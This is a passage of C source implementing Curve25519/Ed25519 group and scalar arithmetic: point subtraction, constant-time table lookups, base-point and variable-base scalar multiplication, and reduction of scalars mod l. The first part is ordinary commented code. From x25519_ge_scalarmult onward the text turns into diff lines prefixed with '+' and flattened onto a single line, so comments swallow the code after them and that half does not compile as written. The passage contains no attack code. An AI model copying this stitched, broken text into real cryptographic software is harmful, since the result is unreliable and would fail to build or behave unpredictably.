  fe_sub(&r->T, &trZ, &trT);
}

// r = p - q
void x25519_ge_sub(ge_p1p1 *r, const ge_p3 *p, const ge_cached *q) {
  fe trX, trY, trZ, trT;

  // Same as |x25519_ge_add| with the roles of q.YplusX and q.YminusX exchanged
  // and the final add and sub exchanged.
  fe_add(&r->X, &p->Y, &p->X);
  fe_sub(&r->Y, &p->Y, &p->X);
  fe_mul_tll(&trZ, &r->X, &q->YminusX);
  fe_mul_tll(&trY, &r->Y, &q->YplusX);
  fe_mul_tlt(&trT, &q->T2d, &p->T);
  fe_mul_ttl(&trX, &p->Z, &q->Z);
  fe_add(&r->T, &trX, &trX);
  fe_sub(&r->X, &trZ, &trY);
  fe_add(&r->Y, &trZ, &trY);
  fe_carry(&trZ, &r->T);
  fe_sub(&r->Z, &trZ, &trT);
  fe_add(&r->T, &trZ, &trT);
}

// equal returns 1 if b == c and 0 otherwise, computed with arithmetic only
// (no comparison or branch on the inputs).
static uint8_t equal(signed char b, signed char c) {
  uint8_t ub = b;
  uint8_t uc = c;
  uint8_t x = ub ^ uc;  // 0: yes; 1..255: no
  uint32_t y = x;       // 0: yes; 1..255: no
  y -= 1;               // 4294967295: yes; 0..254: no
  y >>= 31;             // 1: yes; 0: no
  return y;
}

// cmov copies |u| into |t| if b == 1 and leaves |t| unchanged if b == 0, by
// applying |fe_cmov| to each of the three fields.
static void cmov(ge_precomp *t, const ge_precomp *u, uint8_t b) {
  fe_cmov(&t->yplusx, &u->yplusx, b);
  fe_cmov(&t->yminusx, &u->yminusx, b);
  fe_cmov(&t->xy2d, &u->xy2d, b);
}

// x25519_ge_scalarmult_small_precomp computes |h| from the 32-byte scalar |a|
// and a table of 15 precomputed points, each stored as two 32-byte field
// element encodings (x then y).
void x25519_ge_scalarmult_small_precomp(
    ge_p3 *h, const uint8_t a[32], const uint8_t precomp_table[15 * 2 * 32]) {
  // precomp_table is first expanded into matching |ge_precomp|
  // elements.
  ge_precomp multiples[15];

  unsigned i;
  for (i = 0; i < 15; i++) {
    // The precomputed table is assumed to already clear the top bit, so
    // |fe_frombytes_strict| may be used directly.
    const uint8_t *bytes = &precomp_table[i*(2 * 32)];
    fe x, y;
    fe_frombytes_strict(&x, bytes);
    fe_frombytes_strict(&y, bytes + 32);

    ge_precomp *out = &multiples[i];
    fe_add(&out->yplusx, &y, &x);
    fe_sub(&out->yminusx, &y, &x);
    fe_mul_ltt(&out->xy2d, &x, &y);
    fe_mul_llt(&out->xy2d, &out->xy2d, &d2);  // xy2d = x * y * d2
  }

  // See the comment above |k25519SmallPrecomp| about the structure of the
  // precomputed elements. This loop does 64 additions and 64 doublings to
  // calculate the result.
  ge_p3_0(h);

  // |i| is unsigned: decrementing past 0 wraps to a large value, which fails
  // i < 64 and ends the loop, so i takes the values 63 down to 0.
  for (i = 63; i < 64; i--) {
    unsigned j;
    signed char index = 0;

    // Build a 4-bit index from bit i of each of the four 64-bit quarters of
    // the scalar (bytes 0-7, 8-15, 16-23, 24-31).
    for (j = 0; j < 4; j++) {
      const uint8_t bit = 1 & (a[(8 * j) + (i / 8)] >> (i & 7));
      index |= (bit << j);
    }

    // Select multiples[index - 1], or leave |e| at its |ge_precomp_0| value
    // when index == 0. Every table entry is visited regardless of |index|.
    ge_precomp e;
    ge_precomp_0(&e);

    for (j = 1; j < 16; j++) {
      cmov(&e, &multiples[j-1], equal(index, j));
    }

    // h = 2 * h (computed as h + h), then h = h + e.
    ge_cached cached;
    ge_p1p1 r;
    x25519_ge_p3_to_cached(&cached, h);
    x25519_ge_add(&r, h, &cached);
    x25519_ge_p1p1_to_p3(h, &r);

    ge_madd(&r, h, &e);
    x25519_ge_p1p1_to_p3(h, &r);
  }
}

#if defined(OPENSSL_SMALL)

// With OPENSSL_SMALL defined, the base-point multiplication uses the small
// table |k25519SmallPrecomp|.
void x25519_ge_scalarmult_base(ge_p3 *h, const uint8_t a[32]) {
  x25519_ge_scalarmult_small_precomp(h, a, k25519SmallPrecomp);
}

#else

// negative returns 1 if b < 0 and 0 otherwise: |b| is converted to uint32_t
// and the top bit is extracted.
static uint8_t negative(signed char b) {
  uint32_t x = b;
  x >>= 31;  // 1: yes; 0: no
  return x;
}

// table_select sets |t| to |b| times entry |pos| of |k25519Precomp|, for b in
// the range -8..8 produced by |x25519_ge_scalarmult_base|: the entry for |b|'s
// absolute value is selected by scanning all eight candidates, and the result
// is replaced by its negation when |b| is negative. b == 0 yields the
// |ge_precomp_0| value.
static void table_select(ge_precomp *t, int pos, signed char b) {
  ge_precomp minust;
  uint8_t bnegative = negative(b);
  // babs = |b|: when b is negative, (-bnegative) & b is b itself, so this
  // subtracts 2 * b (reduced to 8 bits); otherwise it subtracts 0.
  uint8_t babs = b - ((uint8_t)((-bnegative) & b) << 1);

  ge_precomp_0(t);
  cmov(t, &k25519Precomp[pos][0], equal(babs, 1));
  cmov(t, &k25519Precomp[pos][1], equal(babs, 2));
  cmov(t, &k25519Precomp[pos][2], equal(babs, 3));
  cmov(t, &k25519Precomp[pos][3], equal(babs, 4));
  cmov(t, &k25519Precomp[pos][4], equal(babs, 5));
  cmov(t, &k25519Precomp[pos][5], equal(babs, 6));
  cmov(t, &k25519Precomp[pos][6], equal(babs, 7));
  cmov(t, &k25519Precomp[pos][7], equal(babs, 8));

  // minust = -t: exchange yplusx and yminusx, and negate xy2d.
  fe_copy_ll(&minust.yplusx, &t->yminusx);
  fe_copy_ll(&minust.yminusx, &t->yplusx);

  // NOTE: the input table is canonical, but types don't encode it
  fe tmp;
  fe_carry(&tmp, &t->xy2d);
  fe_neg(&minust.xy2d, &tmp);

  cmov(t, &minust, bnegative);
}

// h = a * B
// where a = a[0]+256*a[1]+...+256^31 a[31]
// B is the Ed25519 base point (x,4/5) with x positive.
//
// Preconditions:
//   a[31] <= 127
void x25519_ge_scalarmult_base(ge_p3 *h, const uint8_t a[32]) {
  signed char e[64];
  signed char carry;
  ge_p1p1 r;
  ge_p2 s;
  ge_precomp t;
  int i;

  // Split the scalar into 64 nibbles, least significant first.
  for (i = 0; i < 32; ++i) {
    e[2 * i + 0] = (a[i] >> 0) & 15;
    e[2 * i + 1] = (a[i] >> 4) & 15;
  }
  // each e[i] is between 0 and 15
  // e[63] is between 0 and 7

  // Recode to signed digits: a digit that is 8 or more is reduced by 16 and a
  // carry of 1 is added to the next digit.
  carry = 0;
  for (i = 0; i < 63; ++i) {
    e[i] += carry;
    carry = e[i] + 8;
    carry >>= 4;
    e[i] -= carry << 4;
  }
  e[63] += carry;
  // each e[i] is between -8 and 8

  // First pass: accumulate the odd-indexed digits.
  ge_p3_0(h);
  for (i = 1; i < 64; i += 2) {
    table_select(&t, i / 2, e[i]);
    ge_madd(&r, h, &t);
    x25519_ge_p1p1_to_p3(h, &r);
  }

  // Four doublings, i.e. h = 16 * h.
  ge_p3_dbl(&r, h);
  x25519_ge_p1p1_to_p2(&s, &r);
  ge_p2_dbl(&r, &s);
  x25519_ge_p1p1_to_p2(&s, &r);
  ge_p2_dbl(&r, &s);
  x25519_ge_p1p1_to_p2(&s, &r);
  ge_p2_dbl(&r, &s);
  x25519_ge_p1p1_to_p3(h, &r);

  // Second pass: accumulate the even-indexed digits.
  for (i = 0; i < 64; i += 2) {
    table_select(&t, i / 2, e[i]);
    ge_madd(&r, h, &t);
    x25519_ge_p1p1_to_p3(h, &r);
  }
}

#endif

// cmov_cached copies |u| into |t| if b == 1 and leaves |t| unchanged if
// b == 0, by applying |fe_cmov| to each of the four fields.
static void cmov_cached(ge_cached *t, ge_cached *u, uint8_t b) {
  fe_cmov(&t->YplusX, &u->YplusX, b);
  fe_cmov(&t->YminusX, &u->YminusX, b);
  fe_cmov(&t->Z, &u->Z, b);
  fe_cmov(&t->T2d, &u->T2d, b);
}

// r = scalar * A.
// where a = a[0]+256*a[1]+...+256^31 a[31].
+void x25519_ge_scalarmult(ge_p2 *r, const uint8_t *scalar, const ge_p3 *A) { + ge_p2 Ai_p2[8]; + ge_cached Ai[16]; + ge_p1p1 t; + ge_cached_0(&Ai[0]); + x25519_ge_p3_to_cached(&Ai[1], A); + ge_p3_to_p2(&Ai_p2[1], A); + unsigned i; + for (i = 2; i < 16; i += 2) { + ge_p2_dbl(&t, &Ai_p2[i / 2]); + ge_p1p1_to_cached(&Ai[i], &t); + if (i < 8) { + x25519_ge_p1p1_to_p2(&Ai_p2[i], &t); + } + x25519_ge_add(&t, A, &Ai[i]); + ge_p1p1_to_cached(&Ai[i + 1], &t); + if (i < 7) { + x25519_ge_p1p1_to_p2(&Ai_p2[i + 1], &t); + } + } + ge_p2_0(r); + ge_p3 u; + for (i = 0; i < 256; i += 4) { + ge_p2_dbl(&t, r); + x25519_ge_p1p1_to_p2(r, &t); + ge_p2_dbl(&t, r); + x25519_ge_p1p1_to_p2(r, &t); + ge_p2_dbl(&t, r); + x25519_ge_p1p1_to_p2(r, &t); + ge_p2_dbl(&t, r); + x25519_ge_p1p1_to_p3(&u, &t); + uint8_t index = scalar[31 - i/8]; + index >>= 4 - (i & 4); + index &= 0xf; + unsigned j; + ge_cached selected; + ge_cached_0(&selected); + for (j = 0; j < 16; j++) { + cmov_cached(&selected, &Ai[j], equal(j, index)); + } + x25519_ge_add(&t, &u, &selected); + x25519_ge_p1p1_to_p2(r, &t); + } +} +static void slide(signed char *r, const uint8_t *a) { + int i; + int b; + int k; + for (i = 0; i < 256; ++i) { + r[i] = 1 & (a[i >> 3] >> (i & 7)); + } + for (i = 0; i < 256; ++i) { + if (r[i]) { + for (b = 1; b <= 6 && i + b < 256; ++b) { + if (r[i + b]) { + if (r[i] + (r[i + b] << b) <= 15) { + r[i] += r[i + b] << b; + r[i + b] = 0; + } else if (r[i] - (r[i + b] << b) >= -15) { + r[i] -= r[i + b] << b; + for (k = i + b; k < 256; ++k) { + if (!r[k]) { + r[k] = 1; + break; + } + r[k] = 0; + } + } else { + break; + } + } + } + } + } +} +// r = a * A + b * B +// where a = a[0]+256*a[1]+...+256^31 a[31]. +// and b = b[0]+256*b[1]+...+256^31 b[31]. +// B is the Ed25519 base point (x,4/5) with x positive. 
+static void ge_double_scalarmult_vartime(ge_p2 *r, const uint8_t *a, + const ge_p3 *A, const uint8_t *b) { + signed char aslide[256]; + signed char bslide[256]; + ge_cached Ai[8]; // A,3A,5A,7A,9A,11A,13A,15A + ge_p1p1 t; + ge_p3 u; + ge_p3 A2; + int i; + slide(aslide, a); + slide(bslide, b); + x25519_ge_p3_to_cached(&Ai[0], A); + ge_p3_dbl(&t, A); + x25519_ge_p1p1_to_p3(&A2, &t); + x25519_ge_add(&t, &A2, &Ai[0]); + x25519_ge_p1p1_to_p3(&u, &t); + x25519_ge_p3_to_cached(&Ai[1], &u); + x25519_ge_add(&t, &A2, &Ai[1]); + x25519_ge_p1p1_to_p3(&u, &t); + x25519_ge_p3_to_cached(&Ai[2], &u); + x25519_ge_add(&t, &A2, &Ai[2]); + x25519_ge_p1p1_to_p3(&u, &t); + x25519_ge_p3_to_cached(&Ai[3], &u); + x25519_ge_add(&t, &A2, &Ai[3]); + x25519_ge_p1p1_to_p3(&u, &t); + x25519_ge_p3_to_cached(&Ai[4], &u); + x25519_ge_add(&t, &A2, &Ai[4]); + x25519_ge_p1p1_to_p3(&u, &t); + x25519_ge_p3_to_cached(&Ai[5], &u); + x25519_ge_add(&t, &A2, &Ai[5]); + x25519_ge_p1p1_to_p3(&u, &t); + x25519_ge_p3_to_cached(&Ai[6], &u); + x25519_ge_add(&t, &A2, &Ai[6]); + x25519_ge_p1p1_to_p3(&u, &t); + x25519_ge_p3_to_cached(&Ai[7], &u); + ge_p2_0(r); + for (i = 255; i >= 0; --i) { + if (aslide[i] || bslide[i]) { + break; + } + } + for (; i >= 0; --i) { + ge_p2_dbl(&t, r); + if (aslide[i] > 0) { + x25519_ge_p1p1_to_p3(&u, &t); + x25519_ge_add(&t, &u, &Ai[aslide[i] / 2]); + } else if (aslide[i] < 0) { + x25519_ge_p1p1_to_p3(&u, &t); + x25519_ge_sub(&t, &u, &Ai[(-aslide[i]) / 2]); + } + if (bslide[i] > 0) { + x25519_ge_p1p1_to_p3(&u, &t); + ge_madd(&t, &u, &Bi[bslide[i] / 2]); + } else if (bslide[i] < 0) { + x25519_ge_p1p1_to_p3(&u, &t); + ge_msub(&t, &u, &Bi[(-bslide[i]) / 2]); + } + x25519_ge_p1p1_to_p2(r, &t); + } +} +// int64_lshift21 returns |a << 21| but is defined when shifting bits into the +// sign bit. This works around a language flaw in C. 
+static inline int64_t int64_lshift21(int64_t a) { + return (int64_t)((uint64_t)a << 21); +} +// The set of scalars is \Z/l +// where l = 2^252 + 27742317777372353535851937790883648493. +// Input: +// s[0]+256*s[1]+...+256^63*s[63] = s +// +// Output: +// s[0]+256*s[1]+...+256^31*s[31] = s mod l +// where l = 2^252 + 27742317777372353535851937790883648493. +// Overwrites s in place. +void x25519_sc_reduce(uint8_t s[64]) { + int64_t s0 = 2097151 & load_3(s); + int64_t s1 = 2097151 & (load_4(s + 2) >> 5); + int64_t s2 = 2097151 & (load_3(s + 5) >> 2); + int64_t s3 = 2097151 & (load_4(s + 7) >> 7); + int64_t s4 = 2097151 & (load_4(s + 10) >> 4); + int64_t s5 = 2097151 & (load_3(s + 13) >> 1); + int64_t s6 = 2097151 & (load_4(s + 15) >> 6); + int64_t s7 = 2097151 & (load_3(s + 18) >> 3); + int64_t s8 = 2097151 & load_3(s + 21); + int64_t s9 = 2097151 & (load_4(s + 23) >> 5); + int64_t s10 = 2097151 & (load_3(s + 26) >> 2); + int64_t s11 = 2097151 & (load_4(s + 28) >> 7); + int64_t s12 = 2097151 & (load_4(s + 31) >> 4); + int64_t s13 = 2097151 & (load_3(s + 34) >> 1); + int64_t s14 = 2097151 & (load_4(s + 36) >> 6); + int64_t s15 = 2097151 & (load_3(s + 39) >> 3); + int64_t s16 = 2097151 & load_3(s + 42); + int64_t s17 = 2097151 & (load_4(s + 44) >> 5); + int64_t s18 = 2097151 & (load_3(s + 47) >> 2); + int64_t s19 = 2097151 & (load_4(s + 49) >> 7); + int64_t s20 = 2097151 & (load_4(s + 52) >> 4); + int64_t s21 = 2097151 & (load_3(s + 55) >> 1); + int64_t s22 = 2097151 & (load_4(s + 57) >> 6); + int64_t s23 = (load_4(s + 60) >> 3); + int64_t carry0; + int64_t carry1; + int64_t carry2; + int64_t carry3; + int64_t carry4; + int64_t carry5; + int64_t carry6; + int64_t carry7; + int64_t carry8; + int64_t carry9; + int64_t carry10; + int64_t carry11; + int64_t carry12; + int64_t carry13; + int64_t carry14; + int64_t carry15; + int64_t carry16; + s11 += s23 * 666643; + s12 += s23 * 470296; + s13 += s23 * 654183; + s14 -= s23 * 997805; + s15 += s23 * 136657; + s16 -= s23 * 
683901; + s23 = 0; + s10 += s22 * 666643; + s11 += s22 * 470296; + s12 += s22 * 654183; + s13 -= s22 * 997805; + s14 += s22 * 136657; + s15 -= s22 * 683901; + s22 = 0; + s9 += s21 * 666643; + s10 += s21 * 470296; + s11 += s21 * 654183; + s12 -= s21 * 997805; + s13 += s21 * 136657; + s14 -= s21 * 683901; + s21 = 0; + s8 += s20 * 666643; + s9 += s20 * 470296; + s10 += s20 * 654183; + s11 -= s20 * 997805; + s12 += s20 * 136657; + s13 -= s20 * 683901; + s20 = 0; + s7 += s19 * 666643; + s8 += s19 * 470296; + s9 += s19 * 654183; + s10 -= s19 * 997805; + s11 += s19 * 136657; + s12 -= s19 * 683901; + s19 = 0; + s6 += s18 * 666643; + s7 += s18 * 470296; + s8 += s18 * 654183; + s9 -= s18 * 997805; + s10 += s18 * 136657; + s11 -= s18 * 683901; + s18 = 0; + carry6 = (s6 + (1 << 20)) >> 21; + s7 += carry6; + s6 -= int64_lshift21(carry6); + carry8 = (s8 + (1 << 20)) >> 21; + s9 += carry8; + s8 -= int64_lshift21(carry8); + carry10 = (s10 + (1 << 20)) >> 21; + s11 += carry10; + s10 -= int64_lshift21(carry10); + carry12 = (s12 + (1 << 20)) >> 21; + s13 += carry12; + s12 -= int64_lshift21(carry12); + carry14 = (s14 + (1 << 20)) >> 21; + s15 += carry14; + s14 -= int64_lshift21(carry14); + carry16 = (s16 + (1 << 20)) >> 21; + s17 += carry16; + s16 -= int64_lshift21(carry16); + carry7 = (s7 + (1 << 20)) >> 21; + s8 += carry7; + s7 -= int64_lshift21(carry7); + carry9 = (s9 + (1 << 20)) >> 21; + s10 += carry9; + s9 -= int64_lshift21(carry9); + carry11 = (s11 + (1 << 20)) >> 21; + s12 += carry11; + s11 -= int64_lshift21(carry11); + carry13 = (s13 + (1 << 20)) >> 21; + s14 += carry13; + s13 -= int64_lshift21(carry13); + carry15 = (s15 + (1 << 20)) >> 21; + s16 += carry15; + s15 -= int64_lshift21(carry15); + s5 += s17 * 666643; + s6 += s17 * 470296; + s7 += s17 * 654183; + s8 -= s17 * 997805; + s9 += s17 * 136657; + s10 -= s17 * 683901; + s17 = 0; + s4 += s16 * 666643; + s5 += s16 * 470296; + s6 += s16 * 654183; + s7 -= s16 * 997805; + s8 += s16 * 136657; + s9 -= s16 * 683901; + s16 = 0; + 
s3 += s15 * 666643; + s4 += s15 * 470296; + s5 += s15 * 654183; + s6 -= s15 * 997805; + s7 += s15 * 136657; + s8 -= s15 * 683901; + s15 = 0; + s2 += s14 * 666643; + s3 += s14 * 470296; + s4 += s14 * 654183; + s5 -= s14 * 997805; + s6 += s14 * 136657; + s7 -= s14 * 683901; + s14 = 0; + s1 += s13 * 666643; + s2 += s13 * 470296; + s3 += s13 * 654183; + s4 -= s13 * 997805; + s5 += s13 * 136657; + s6 -= s13 * 683901; + s13 = 0; + s0 += s12 * 666643; + s1 += s12 * 470296; + s2 += s12 * 654183; + s3 -= s12 * 997805; + s4 += s12 * 136657; + s5 -= s12 * 683901; + s12 = 0; + carry0 = (s0 + (1 << 20)) >> 21; + s1 += carry0; + s0 -= int64_lshift21(carry0); + carry2 = (s2 + (1 << 20)) >> 21; + s3 += carry2; + s2 -= int64_lshift21(carry2); + carry4 = (s4 + (1 << 20)) >> 21; + s5 += carry4; + s4 -= int64_lshift21(carry4); + carry6 = (s6 + (1 << 20)) >> 21; + s7 += carry6; + s6 -= int64_lshift21(carry6); + carry8 = (s8 + (1 << 20)) >> 21; + s9 += carry8; + s8 -= int64_lshift21(carry8); + carry10 = (s10 + (1 << 20)) >> 21; + s11 += carry10; + s10 -= int64_lshift21(carry10); + carry1 = (s1 + (1 << 20)) >> 21; + s2 += carry1; + s1 -= int64_lshift21(carry1); + carry3 = (s3 + (1 << 20)) >> 21; + s4 += carry3; + s3 -= int64_lshift21(carry3); + carry5 = (s5 + (1 << 20)) >> 21; + s6 += carry5; + s5 -= int64_lshift21(carry5); + carry7 = (s7 + (1 << 20)) >> 21; + s8 += carry7; + s7 -= int64_lshift21(carry7); + carry9 = (s9 + (1 << 20)) >> 21; + s10 += carry9; + s9 -= int64_lshift21(carry9); + carry11 = (s11 + (1 << 20)) >> 21; + s12 += carry11; + s11 -= int64_lshift21(carry11); + s0 += s12 * 666643; + s1 += s12 * 470296; + s2 += s12 * 654183; + s3 -= s12 * 997805; + s4 += s12 * 136657; + s5 -= s12 * 683901; + s12 = 0; + carry0 = s0 >> 21; + s1 += carry0; + s0 -= int64_lshift21(carry0); + carry1 = s1 >> 21; + s2 += carry1; + s1 -= int64_lshift21(carry1); + carry2 = s2 >> 21; + s3 += carry2; + s2 -= int64_lshift21(carry2); + carry3 = s3 >> 21; + s4 += carry3; + s3 -= int64_lshift21(carry3); + 
carry4 = s4 >> 21; + s5 += carry4; + s4 -= int64_lshift21(carry4); + carry5 = s5 >> 21; + s6 += carry5; + s5 -= int64_lshift21(carry5); + carry6 = s6 >> 21; + s7 += carry6; + s6 -= int64_lshift21(carry6); + carry7 = s7 >> 21; + s8 += carry7; + s7 -= int64_lshift21(carry7); + carry8 = s8 >> 21; + s9 += carry8; + s8 -= int64_lshift21(carry8); + carry9 = s9 >> 21; + s10 += carry9; + s9 -= int64_lshift21(carry9); + carry10 = s10 >> 21; + s11 += carry10; + s10 -= int64_lshift21(carry10); + carry11 = s11 >> 21; + s12 += carry11; + s11 -= int64_lshift21(carry11); + s0 += s12 * 666643; + s1 += s12 * 470296; + s2 += s12 * 654183; + s3 -= s12 * 997805; + s4 += s12 * 136657; + s5 -= s12 * 683901; + s12 = 0; + carry0 = s0 >> 21; + s1 += carry0; + s0 -= int64_lshift21(carry0); + carry1 = s1 >> 21; + s2 += carry1; + s1 -= int64_lshift21(carry1); + carry2 = s2 >> 21; + s3 += carry2; + s2 -= int64_lshift21(carry2); + carry3 = s3 >> 21; + s4 += carry3; + s3 -= int64_lshift21(carry3); + carry4 = s4 >> 21; + s5 += carry4; + s4 -= int64_lshift21(carry4); + carry5 = s5 >> 21; + s6 += carry5; + s5 -= int64_lshift21(carry5); + carry6 = s6 >> 21; + s7 += carry6; + s6 -= int64_lshift21(carry6); + carry7 = s7 >> 21; + s8 += carry7; + s7 -= int64_lshift21(carry7); + carry8 = s8 >> 21; + s9 += carry8; + s8 -= int64_lshift21(carry8); + carry9 = s9 >> 21; + s10 += carry9; + s9 -= int64_lshift21(carry9); + carry10 = s10 >> 21; + s11 += carry10; + s10 -= int64_lshift21(carry10); + s[0] = s0 >> 0; + s[1] = s0 >> 8; + s[2] = (s0 >> 16) | (s1 << 5); + s[3] = s1 >> 3; + s[4] = s1 >> 11; + s[5] = (s1 >> 19) | (s2 << 2); + s[6] = s2 >> 6; + s[7] = (s2 >> 14) | (s3 << 7); + s[8] = s3 >> 1; + s[9] = s3 >> 9; + s[10] = (s3 >> 17) | (s4 << 4); + s[11] = s4 >> 4; + s[12] = s4 >> 12; + s[13] = (s4 >> 20) | (s5 << 1); + s[14] = s5 >> 7; + s[15] = (s5 >> 15) | (s6 << 6); + s[16] = s6 >> 2; + s[17] = s6 >> 10; + s[18] = (s6 >> 18) | (s7 << 3); + s[19] = s7 >> 5; + s[20] = s7 >> 13; + s[21] = s8 >> 0; + s[22] = 
s8 >> 8; + s[23] = (s8 >> 16) | (s9 << 5); + s[24] = s9 >> 3; + s[25] = s9 >> 11; + s[26] = (s9 >> 19) | (s10 << 2); + s[27] = s10 >> 6; + s[28] = (s10 >> 14) | (s11 << 7); + s[29] = s11 >> 1; + s[30] = s11 >> 9; + s[31] = s11 >> 17; +} +// Input: +// a[0]+256*a[1]+...+256^31*a[31] = a +// b[0]+256*b[1]+...+256^31*b[31] = b +// c[0]+256*c[1]+...+256^31*c[31] = c +// +// Output: +// s[0]+256*s[1]+...+256^31*s[31] = (ab+c) mod l +// where l = 2^252 + 27742317777372353535851937790883648493. +static void sc_muladd(uint8_t *s, const uint8_t *a, const uint8_t *b, + const uint8_t *c) { + int64_t a0 = 2097151 & load_3(a); + int64_t a1 = 2097151 & (load_4(a + 2) >> 5); + int64_t a2 = 2097151 & (load_3(a + 5) >> 2); + int64_t a3 = 2097151 & (load_4(a + 7) >> 7); + int64_t a4 = 2097151 & (load_4(a + 10) >> 4); + int64_t a5 = 2097151 & (load_3(a + 13) >> 1); + int64_t a6 = 2097151 & (load_4(a + 15) >> 6); + int64_t a7 = 2097151 & (load_3(a + 18) >> 3); + int64_t a8 = 2097151 & load_3(a + 21); + int64_t a9 = 2097151 & (load_4(a + 23) >> 5); + int64_t a10 = 2097151 & (load_3(a + 26) >> 2); + int64_t a11 = (load_4(a + 28) >> 7); + int64_t b0 = 2097151 & load_3(b); + int64_t b1 = 2097151 & (load_4(b + 2) >> 5); + int64_t b2 = 2097151 & (load_3(b + 5) >> 2); + int64_t b3 = 2097151 & (load_4(b + 7) >> 7); + int64_t b4 = 2097151 & (load_4(b + 10) >> 4); + int64_t b5 = 2097151 & (load_3(b + 13) >> 1); + int64_t b6 = 2097151 & (load_4(b + 15) >> 6); + int64_t b7 = 2097151 & (load_3(b + 18) >> 3); + int64_t b8 = 2097151 & load_3(b + 21); + int64_t b9 = 2097151 & (load_4(b + 23) >> 5); + int64_t b10 = 2097151 & (load_3(b + 26) >> 2); + int64_t b11 = (load_4(b + 28) >> 7); + int64_t c0 = 2097151 & load_3(c); + int64_t c1 = 2097151 & (load_4(c + 2) >> 5); + int64_t c2 = 2097151 & (load_3(c + 5) >> 2); + int64_t c3 = 2097151 & (load_4(c + 7) >> 7); + int64_t c4 = 2097151 & (load_4(c + 10) >> 4); + int64_t c5 = 2097151 & (load_3(c + 13) >> 1); + int64_t c6 = 2097151 & (load_4(c + 15) >> 6); 
+ int64_t c7 = 2097151 & (load_3(c + 18) >> 3); + int64_t c8 = 2097151 & load_3(c + 21); + int64_t c9 = 2097151 & (load_4(c + 23) >> 5); + int64_t c10 = 2097151 & (load_3(c + 26) >> 2); + int64_t c11 = (load_4(c + 28) >> 7); + int64_t s0; + int64_t s1; + int64_t s2; + int64_t s3; + int64_t s4; + int64_t s5; + int64_t s6; + int64_t s7; + int64_t s8; + int64_t s9; + int64_t s10; + int64_t s11; + int64_t s12; + int64_t s13; + int64_t s14; + int64_t s15; + int64_t s16; + int64_t s17; + int64_t s18; + int64_t s19; + int64_t s20; + int64_t s21; + int64_t s22; + int64_t s23; + int64_t carry0; + int64_t carry1; + int64_t carry2; + int64_t carry3; + int64_t carry4; + int64_t carry5; + int64_t carry6; + int64_t carry7; + int64_t carry8; + int64_t carry9; + int64_t carry10; + int64_t carry11; + int64_t carry12; + int64_t carry13; + int64_t carry14; + int64_t carry15; + int64_t carry16; + int64_t carry17; + int64_t carry18; + int64_t carry19; + int64_t carry20; + int64_t carry21; + int64_t carry22; + s0 = c0 + a0 * b0; + s1 = c1 + a0 * b1 + a1 * b0; + s2 = c2 + a0 * b2 + a1 * b1 + a2 * b0; + s3 = c3 + a0 * b3 + a1 * b2 + a2 * b1 + a3 * b0; + s4 = c4 + a0 * b4 + a1 * b3 + a2 * b2 + a3 * b1 + a4 * b0; + s5 = c5 + a0 * b5 + a1 * b4 + a2 * b3 + a3 * b2 + a4 * b1 + a5 * b0; + s6 = c6 + a0 * b6 + a1 * b5 + a2 * b4 + a3 * b3 + a4 * b2 + a5 * b1 + a6 * b0; + s7 = c7 + a0 * b7 + a1 * b6 + a2 * b5 + a3 * b4 + a4 * b3 + a5 * b2 + + a6 * b1 + a7 * b0; + s8 = c8 + a0 * b8 + a1 * b7 + a2 * b6 + a3 * b5 + a4 * b4 + a5 * b3 + + a6 * b2 + a7 * b1 + a8 * b0; + s9 = c9 + a0 * b9 + a1 * b8 + a2 * b7 + a3 * b6 + a4 * b5 + a5 * b4 + + a6 * b3 + a7 * b2 + a8 * b1 + a9 * b0; + s10 = c10 + a0 * b10 + a1 * b9 + a2 * b8 + a3 * b7 + a4 * b6 + a5 * b5 + + a6 * b4 + a7 * b3 + a8 * b2 + a9 * b1 + a10 * b0; + s11 = c11 + a0 * b11 + a1 * b10 + a2 * b9 + a3 * b8 + a4 * b7 + a5 * b6 + + a6 * b5 + a7 * b4 + a8 * b3 + a9 * b2 + a10 * b1 + a11 * b0; + s12 = a1 * b11 + a2 * b10 + a3 * b9 + a4 * b8 + a5 * b7 + a6 * 
b6 + a7 * b5 + + a8 * b4 + a9 * b3 + a10 * b2 + a11 * b1; + s13 = a2 * b11 + a3 * b10 + a4 * b9 + a5 * b8 + a6 * b7 + a7 * b6 + a8 * b5 + + a9 * b4 + a10 * b3 + a11 * b2; + s14 = a3 * b11 + a4 * b10 + a5 * b9 + a6 * b8 + a7 * b7 + a8 * b6 + a9 * b5 + + a10 * b4 + a11 * b3; + s15 = a4 * b11 + a5 * b10 + a6 * b9 + a7 * b8 + a8 * b7 + a9 * b6 + a10 * b5 + + a11 * b4; + s16 = a5 * b11 + a6 * b10 + a7 * b9 + a8 * b8 + a9 * b7 + a10 * b6 + a11 * b5; + s17 = a6 * b11 + a7 * b10 + a8 * b9 + a9 * b8 + a10 * b7 + a11 * b6; + s18 = a7 * b11 + a8 * b10 + a9 * b9 + a10 * b8 + a11 * b7; + s19 = a8 * b11 + a9 * b10 + a10 * b9 + a11 * b8; + s20 = a9 * b11 + a10 * b10 + a11 * b9; + s21 = a10 * b11 + a11 * b10; + s22 = a11 * b11; + s23 = 0; + carry0 = (s0 + (1 << 20)) >> 21; + s1 += carry0; + s0 -= int64_lshift21(carry0); + carry2 = (s2 + (1 << 20)) >> 21; + s3 += carry2; + s2 -= int64_lshift21(carry2); + carry4 = (s4 + (1 << 20)) >> 21; + s5 += carry4; + s4 -= int64_lshift21(carry4); + carry6 = (s6 + (1 << 20)) >> 21; + s7 += carry6; + s6 -= int64_lshift21(carry6); + carry8 = (s8 + (1 << 20)) >> 21; + s9 += carry8; + s8 -= int64_lshift21(carry8); + carry10 = (s10 + (1 << 20)) >> 21; + s11 += carry10; + s10 -= int64_lshift21(carry10); + carry12 = (s12 + (1 << 20)) >> 21; + s13 += carry12; + s12 -= int64_lshift21(carry12); + carry14 = (s14 + (1 << 20)) >> 21; + s15 += carry14; + s14 -= int64_lshift21(carry14); + carry16 = (s16 + (1 << 20)) >> 21; + s17 += carry16; + s16 -= int64_lshift21(carry16); + carry18 = (s18 + (1 << 20)) >> 21; + s19 += carry18; + s18 -= int64_lshift21(carry18); + carry20 = (s20 + (1 << 20)) >> 21; + s21 += carry20; + s20 -= int64_lshift21(carry20); + carry22 = (s22 + (1 << 20)) >> 21; + s23 += carry22; + s22 -= int64_lshift21(carry22); + carry1 = (s1 + (1 << 20)) >> 21; + s2 += carry1; + s1 -= int64_lshift21(carry1); + carry3 = (s3 + (1 << 20)) >> 21; + s4 += carry3; + s3 -= int64_lshift21(carry3); + carry5 = (s5 + (1 << 20)) >> 21; + s6 += carry5; + s5 -= 
